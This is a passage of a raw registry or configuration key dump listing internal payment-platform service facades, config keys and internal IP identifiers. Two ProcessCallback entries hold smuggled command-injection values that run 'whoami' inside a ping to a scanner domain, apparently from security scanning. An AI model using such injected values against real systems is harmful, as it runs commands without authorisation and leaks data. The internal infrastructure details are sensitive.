AULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.membertangram.common.service.facade.config.CommonConfigService:1.0:ruleInstanceConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dchainbankloan.facade.api.query.AccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.PolymerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.us.UsInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.218.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:kabaoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.integration.mobileha.AnthaTinyappChangeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.redirectFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.MenuAuthenticationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.deployorder.DeployOrderFeedbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.52.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","antscheduler.server.ip#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilechat.common.service.facade.api.ChatroomManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-paygrowth-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.v2.notifier.facade.NotifierRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.TaskBizInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.62.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprovisioncore.biz.service.impl.resource.testcase.TestCaseSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.darwin.common.service.facade.api.dart.ExperimentDartMetricFocusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.risk.CompanyVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.lisaAntCloudProductInstance,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.securityexprod.common.service.facade.lisa.Z50BDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.yqdataservice.common.service.facade.search.YqAnalysisComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igmatrix.common.service.facade.PlatformCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.query.MFundAccountQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.I18nResourceDrm.i18nResource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.member.facade.CardTemplateFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instrtdecision.common.service.facade.api.PayInstAbilityConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.BizTimeClearingTargetCodeDRM.targetCodeListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.196.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlbs.facade.fence.FenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.UserVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.biz.activity.message.AppointmentSyncEventHandlerTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.buservice:name=com.alipay.zcache.log.buservice.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linke.aci.core.facade.GroupLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.236.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.workflow.WorkflowDutyInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.zdic.common.entity.drm.ZdicDrmConfig.commonCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.core.service.drm.DirectTransBalanceDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.229.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.almcenter.service.facade.api.activity.ActivityPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ireserve.facade.api.AllocateInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.merchant.MerchantRegistionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.EtcTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.equitymarketscore.common.service.facade.api.RoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","supportprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opensupport.common.service.facade.partner.MiniProgramQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.AuthPolicyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimprod.common.service.InsClaimAuditAssistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.106.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sdarttool.facade.instruction.InstructionQaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dasbi.daas.api.ump.MetricDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcfaultcore.facade.DrmDrillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.ssm.SsmAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icsmng.service.facade.cicada.user.UserInfoUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.BPInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:alipaymember@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.182.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessExecutedCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.biz.service.robot.service.FinpwmRobotSummaryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.discoveryFeedsItemCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:inshealthcareprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdataquery.common.service.facade.promo.PromoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.tbase.ALIPAYANTBUSERVICESESSIONID.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.core.service.yeb.repository.AdvanceAccountInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.robot.RobotDataTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.rest.ProductOrderQuerySofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.barcodeprod.common.service.facade.qrcode.QrCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.biz.service.impl.clientSwitch.ClientSwitchManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcQueueCountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mrchprod_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.notify.RemedyNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.shop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:distinguishprod_antprocess_join_verify_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.changecode.ChangeCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_AGDS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordercore.mrch.common.service.spi.BatchArSpi:1.0:hyp-mock-fail-batch-ar-spi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_API#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqFinanceEventDrm.sourceIdentifyList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequote.api.IndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fporgassetnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.audit.AuditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.manage.InstErrorMessageManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.gpRateAdjustRefreshSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.140.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.treasurebag.data.service.ActionNodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.thirdparty.ValueManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antschedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.promotion.MerchantPromotionStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.bicocr.common.service.facade.OcrAlgorithmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.turnOnDBFailover,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_gftax_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.148.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:yanconfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.UserSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.common.gray.api.GrayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_SUPPLYCHAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebcore.common.facade.service.FinVirtualEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finriskmatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.thanks.api.InsThanksEvaluationMetaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:pubbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginInfoServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mpaasweb.common.service.facade.replays.DeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.senior.common.service.facade.point.api.PointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.bizprod.common.service.facade.api.shop.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appxprod.common.service.facade.api.servicedatalabel.ServiceDataLabelMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.sceneinvest.share.api.FinSceneRuleCenterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mpromocenter:name=com.alipay.mpromocenter.client.drm.LabelClientDrmSwitch.localCacheMillSecStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmepcustprod.facade.api.certify.EpVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gftms.facade.api.basic.sync.AccountSyncQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:cfmng-pmcCallBackServiceUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmuneRuleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.common.DomainFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.arulemng.common.service.facade.rule.RuleRecordManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpointprod.facade.api.mng.MpointSubBizTypeMappingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_1216#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.pub.PublicAppQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PAYBIZCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.assistinvestigate.operationlog.facade.OperationLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.service.EquityService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaicontentcore.api.hotevent.HotEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.common.service.FeatureExtMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTFORTUNEALL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.task.RestTaskStatusService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openitemcore.common.service.facade.api.management.dataasset.DataAssetDefineMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.user.AgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.97.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imasp.common.service.facade.industrytask.IndustryTaskServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.UsageServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fporgassetfinancing.common.service.facade.api.FinPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.BackendForestService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.facade.pd.ProductDataMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.finance.StockFinanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:createOfflineRefundAuditProcessHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.explorerEt15DataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.40.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_LOGIC_BILL_ADJUST_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-arater-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.243.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.archimedes.common.service.facade.api.StrategyVersionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ping `whoami`86842598-80102053-uniqueId-104003028.antscanner.global.alipay.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscvprod.common.service.facade.InsCvClaimReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventMessageListener:1.0:ifasFixQuoteResultEventListener@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveServiceForLdc:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.ExecutionServiceFacade:1.0:uiweb@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.api.instance.BFInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.59.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`33024869-uniqueId-104003030.antscanner.global.alipay.com;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.tbase.ipaybuserviceAuthTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcrcportal:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppprod.common.service.facade.recharge.RechargeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.finscene.drm.CacheConfigDrm.enableRichManCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.facade.dragonx.RouteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxprod.common.service.facade.api.sci.SciBenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:preModifySignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.venue.VenueStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.marketing.facade.promotion.service.manager.ActivityManagerWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ismonitor.integration.emcevent.OpsBatchFusingFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditsceneprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:instservicecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcupacore.common.service.facade.api.AuthorizationPartQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.biz.apibus.facade.drm.DrmOpsCldPollingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.LmbFeeNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.vegameta.common.service.facade.event.TryRunSampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.simple.DeliverFacade:1.0:ucdpcore-finance180205@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:secuGrayEngineOnCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.contractquality.api.mbt.MbtCaseParamService:1.0:mbtCaseParam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sts.common.service.facade.api.BugBlockCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetinsight.facade.api.convouchertrialcfg.ConsumerVouchersTrialCfgWorkFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:smcp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.basic.sentence.facade.BasicSentenceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.SystemParameterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.exceptionana.ClientExperienceRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insdataprod.common.service.facade.accident.api.AccidentTermSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.73.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kbbusinessprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CHARGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinpromo.common.service.facade.equity.EquityInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.salary.SalaryMonthRecalculationService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.ImmuneRuleCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@gfmac#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alibaba.dt.onedata3.model.service.IndexDetailService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.service.aggregate.AggregatorCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.content.UnicodeShowAppSceneResource.appSceneListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finslip.common.service.facade.preorder.PreOrderQueryMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:astaralarm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.3